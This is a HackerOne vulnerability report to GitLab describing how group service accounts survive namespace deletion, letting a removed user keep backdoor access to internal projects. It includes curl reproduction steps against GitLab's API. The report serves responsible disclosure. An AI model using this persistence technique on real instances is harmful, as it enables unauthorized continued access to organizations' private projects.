Service account not deleted when namespace is deleted allowing access to internal projects
HackerOne report #2040822 by joaxcar
on 2023-06-27, assigned to GitLab Team
:
Report
Summary
The new service account
feature is subject to the same issue as project and group access tokens previously was, that a service account
connected to a namespace is not deleted when the namespace is deleted. See a long discussion on the topic here https://hackerone.com/reports/1199561
The problem is that a user who owns a group on an instance can create a service account
and if an admin removes the user and all its projects and groups the removed user will still have access to internal
projects through the (now "orphant") service account
.
As with group and project access tokens these namespace connected service accounts should be deleted if the namespace is deleted.
Steps to reproduce
Use either a group with unlimited trial on gitlab.com or use a self hosted premium server. Also make sure to have an access token generated for the user you are testing with.
- Create a new group (or subgroup), take note of the group ID
- Run this in a terminal
curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/groups/<group id>/service_accounts"
- Take a note of the service account ID
- Now run this command to create a token for the service account
curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/groups/<group id>/service_accounts/<service account id>/personal_access_tokens" --data "scopes[]=api" --data "name=service_accounts_token"
- Take a note of the generated access token
- Now use the new access token towards the api
curl --header "PRIVATE-TOKEN: <service_access_token>" "https://gitlab.example.com/api/v4/user"
There is a bug telling you that the user need to accept terms and services, it does not matter, you can see that the service account exists.
7. Now go to https://gitlab.com/groups/NameOfGroup/-/edit and scroll down to advanced, expand it a scroll down to "delete group". Delete the group
8. Do the request from step 6 again and see that the user still exist even when the group is gone
This PoC shows that the issue exists. A more involved PoC would include deleting the user and all its groups, and then prove that the service account is still present. I can write up the steps if needed.
Impact
A deleted user can use service accounts as a back door to access internal
projects after being removed from the instance. The service accounts will have full read access to internal projects and can also create issues and other integrity affecting actions.
How is it working today
Deleting a namespace does not delete the connected service accounts
How it should work
Deleting a namespace should delete any connected service account
Impact
A deleted user can use service accounts as a back door to access internal
projects after being removed from the instance. The service accounts will have full read access to internal projects and can also create issues and other integrity affecting actions.
How To Reproduce
Please add reproducibility information to this section: